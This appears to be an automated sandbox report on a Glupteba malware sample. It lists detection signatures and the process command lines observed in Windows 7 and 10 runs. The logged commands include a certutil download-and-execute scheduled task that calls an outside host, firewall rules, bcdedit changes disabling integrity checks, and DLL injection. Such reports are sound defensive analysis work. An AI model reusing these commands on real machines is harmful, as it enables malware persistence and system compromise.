Analysis Overview
SHA256
7bec73f4ea2b19439f13212e476245d88a0cf3da3a90cb27d684614e0a5affef
Threat Level: Known bad
The file 6fd9d52463f7b9444ae84fccccc96a3b was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
MetaSploit
Glupteba
Modifies boot configuration data using bcdedit
Modifies Windows Firewall
Possible attempt to disable PatchGuard
Unsigned PE
Program crash
GoLang User-Agent
Creates scheduled task(s)
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-22 17:10
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-22 17:10
Reported
2024-01-22 17:13
Platform
win7-20231215-en
Max time kernel
0s
Max time network
127s
Command Line
Signatures
Glupteba
Glupteba payload
MetaSploit
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible attempt to disable PatchGuard
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122171030.log C:\Windows\Logs\CBS\CbsPersist_20240122171030.cab
C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-22 17:10
Reported
2024-01-22 17:13
Platform
win10v2004-20231215-en
Max time kernel
3s
Max time network
150s
Command Line
Signatures
Glupteba
Glupteba payload
MetaSploit
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
Files